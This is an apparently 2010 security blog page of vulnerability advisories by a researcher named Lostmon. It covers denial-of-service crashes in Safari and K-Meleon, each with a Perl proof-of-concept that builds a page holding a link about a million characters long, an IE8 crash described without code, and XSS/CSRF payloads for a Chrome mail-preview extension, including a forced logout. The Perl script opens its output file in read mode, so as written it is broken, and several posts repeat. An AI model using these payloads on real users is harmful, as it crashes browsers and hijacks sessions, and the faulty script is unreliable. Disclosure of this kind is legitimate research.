############################################
Safari for windows Long link DoS
Vendor URL:http://www.apple.com/safari/
Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Vendor notified:Yes exploit available: YES
############################################
Safari is prone vulnerable to Dos with a very long Link...
This issue is exploitable via web links like <a href="very long URL">
click here</a> or similar vectors. Safari fails to render the link
and it turn Frozen resulting in a Denial of service condition.
#################
Versions Tested
#################
I have tested this issue in win xp sp3 and a windows 7 fully pached.
Win XP sp3:
Safari 5.0.X vulnerable
Safari 4.xx vulnerable
windows 7 Ultimate:
Safari 5.0.X vulnerable
Safari 4.xx vulnerable
############
References
############
Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:
####################
Proof Of Concept
####################
#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Usage: $0 <archivo.html>\n";
}
$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";
$datos = $cabecera . $payload . $fin;
open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);
exit;
################## EOF ######################
##############
Related Links
##############
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776
###################### €nd #############################
Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
K-Meleon for windows about:neterror Stack Overflow DoS
############################################
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL:http://kmeleon.sourceforge.net/
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified:Yes exploit available: YES
############################################
K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.
K-Meleon is prone vulnerable to crashing with a very long URL...
Internal web pages like about:neterror does not limit the amount of
chars that a user put in 'c' 'd' params and them if we compose a
malformed url the browser can be chash easy.This issue is exploitable
via web links like click here or via
window.location.replace('very long url') or similar vectors.
#################
Versions Tested
#################
I have tested this issue in win xp sp3 and a windows 7 fully pached.
Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)
windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)
############
References
############
Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:
########################
ASM code stack overflow
########################
################
#Proof Of Concept
################
#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Usage: $0 <archivo.html>\n";
}
$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";
$datos = $cabecera . $payload . $fin;
open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);
exit;
################## EOF ######################
##############
Related Links
##############
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776
###################### €nd #############################
Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL:http://kmeleon.sourceforge.net/
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified:Yes exploit available: YES
############################################
K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.
K-Meleon is prone vulnerable to crashing with a very long URL...
Internal web pages like about:neterror does not limit the amount of
chars that a user put in 'c' 'd' params and them if we compose a
malformed url the browser can be chash easy.This issue is exploitable
via web links like click here or via
window.location.replace('very long url') or similar vectors.
#################
Versions Tested
#################
I have tested this issue in win xp sp3 and a windows 7 fully pached.
Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)
windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)
############
References
############
Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:
########################
ASM code stack overflow
########################
################
#Proof Of Concept
################
#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################
$archivo = $ARGV[0];
if(!defined($archivo))
{
print "Usage: $0 <archivo.html>\n";
}
$cabecera = "<html>" . "\n";
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x 1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";
$datos = $cabecera . $payload . $fin;
open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);
exit;
################## EOF ######################
##############
Related Links
##############
vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776
###################### €nd #############################
Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
IE8 On windows 7 32 bits unspecified DoS
Tuesday, July 13, 2010
##########################################
IE8 On windows 7 32 bits unspecified DoS
Vendor URL:http://www.microsoft.com
Advisore:http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html
Vendor Notify:YES Vendor confirmed:YES
EXPLOIT:Private
###########################################
A posible flaw exits in Internet explorer 8
on windows 7 32-bits ,that can cause a remote
denial of service from a malformed web page.
This issue is tiggered when IE8 try to render
Modal app prompt in conjuncion with thirds appz that
uses recurses from IE8 and try to render text inputs
it is a posible GDI text-rendering
APIs bug or or DrawText() functions involved.
When the victim visit a malformed web page, an close the 2nd
appz, this appz turns unstable and needs to close , and then
when IE8 try to restore
the tab ,it los the focus from application and it results in
a denial of service to this window , because we can't click
in any bar , in any button or do some action in this window,
ie8 aparently is frozen.
After several test this issue only is reproducible in win7 32 bits
I have a exploit or PoC for this issue , but it's
private at this time :)
Solution:
Microsoft know that as a stability bug and they add it
for consideration in a future version to address it.
#################### €nd ##########################
Thnx for your time !!!
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
IE8 On windows 7 32 bits unspecified DoS
Vendor URL:http://www.microsoft.com
Advisore:http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html
Vendor Notify:YES Vendor confirmed:YES
EXPLOIT:Private
###########################################
A posible flaw exits in Internet explorer 8
on windows 7 32-bits ,that can cause a remote
denial of service from a malformed web page.
This issue is tiggered when IE8 try to render
Modal app prompt in conjuncion with thirds appz that
uses recurses from IE8 and try to render text inputs
it is a posible GDI text-rendering
APIs bug or or DrawText() functions involved.
When the victim visit a malformed web page, an close the 2nd
appz, this appz turns unstable and needs to close , and then
when IE8 try to restore
the tab ,it los the focus from application and it results in
a denial of service to this window , because we can't click
in any bar , in any button or do some action in this window,
ie8 aparently is frozen.
After several test this issue only is reproducible in win7 32 bits
I have a exploit or PoC for this issue , but it's
private at this time :)
Solution:
Microsoft know that as a stability bug and they add it
for consideration in a future version to address it.
#################### €nd ##########################
Thnx for your time !!!
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Google Services Notifier Chrome extension XSS/CSRF
Friday, June 18, 2010
######################################
Google Services Notifier Chrome extension XSS/CSRF
extension:https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie
advisore:http://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.html
Exploit available:yes vendor notify : NO
#######################################
So in this case "Notifier for Google Wave Chrome"
has a flaw that allow attackers to make XSS style attacks.
All extensions runs over his origin and no have way to altered data from extension
or get sensitive data like , email account or password etc..
if we look how many users have instaled this extension =>
https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie
109 users have instaled it (WoW)
############
explanation
############
Google Services Notifier allows users to view wen they have a new wave and
view a preview of it ....
"Keep you update with Google services like Google Mail,Blogger,Reader,YouTube,
Google Docs, Google Wave etc. More services will be added soon."
If a attacker compose a new mail with html or javascript code in
subject & send it to victim´s the code is executed wen Victim´s click in the
extension to view a preview of mail.
So for exploit we need to compose a "special" mail
for example if we put directly in the mail subject a iframe like
"><iframe src="javascript:alert(location.href);"></iframe>
in the two cases the alert is executed wen try to preview the mail
with the extension :) it is executed in context location.href value is
"about:blank"
For example send a mail With a logout acction in google wave in body
"><iframe src="https://wave.google.com/wave/logout"></iframe>
it closes the sesion on google wave , this is a CSRF.
######################€nd#################################
.
Thnx for your time !!!
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Google Services Notifier Chrome extension XSS/CSRF
extension:https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie
advisore:http://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.html
Exploit available:yes vendor notify : NO
#######################################
So in this case "Notifier for Google Wave Chrome"
has a flaw that allow attackers to make XSS style attacks.
All extensions runs over his origin and no have way to altered data from extension
or get sensitive data like , email account or password etc..
if we look how many users have instaled this extension =>
https://chrome.google.com/extensions/detail/dmgbflokapnkfnegeigclohhplnflgie
109 users have instaled it (WoW)
############
explanation
############
Google Services Notifier allows users to view wen they have a new wave and
view a preview of it ....
"Keep you update with Google services like Google Mail,Blogger,Reader,YouTube,
Google Docs, Google Wave etc. More services will be added soon."
If a attacker compose a new mail with html or javascript code in
subject & send it to victim´s the code is executed wen Victim´s click in the
extension to view a preview of mail.
So for exploit we need to compose a "special" mail
for example if we put directly in the mail subject a iframe like
"><iframe src="javascript:alert(location.href);"></iframe>
in the two cases the alert is executed wen try to preview the mail
with the extension :) it is executed in context location.href value is
"about:blank"
For example send a mail With a logout acction in google wave in body
"><iframe src="https://wave.google.com/wave/logout"></iframe>
it closes the sesion on google wave , this is a CSRF.
######################€nd#################################
.
Thnx for your time !!!
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Categories:
browsers,
bug,
CSRF,
extensions,
security,
vulnerability,
XSS
Subscribe to:
Posts (Atom)
